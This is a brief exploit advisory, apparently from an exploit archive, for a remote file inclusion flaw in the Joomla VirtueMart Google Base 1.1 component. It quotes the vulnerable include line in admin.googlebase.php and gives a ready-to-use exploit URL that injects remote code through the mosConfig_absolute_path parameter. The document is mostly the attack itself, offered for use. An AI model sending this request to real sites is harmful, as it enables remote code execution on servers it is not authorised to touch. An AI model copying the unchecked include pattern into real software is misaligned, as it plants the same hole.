id: 4052
date: 11/04/2008
title: Joomla Component VirtueMart Google Base 1.1 RFI Vulnerability
author: NoGe
cves: 

=============================================================
Joomla Component VirtueMart Google Base 1.1 RFI Vulnerability
=============================================================


================================================================================================================================


[o] VirtueMart Google Base Component 1.1 Remote File Inclusion Vulnerability

       Software : com_googlebase version 1.1
       Download : http://www.joomlahacks.com/   [free download]
       Author   : NoGe

================================================================================================================================


  [o] Vulnerable file

       administrator/components/com_googlebase/admin.googlebase.php

        include( $mosConfig_absolute_path.'/administrator/components/com_virtuemart/virtuemart.cfg.php' );



  [o] Exploit

       http://localhost/[path]/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=[evilcode]


================================================================================================================================




#  0day.today [2023-03-26]  #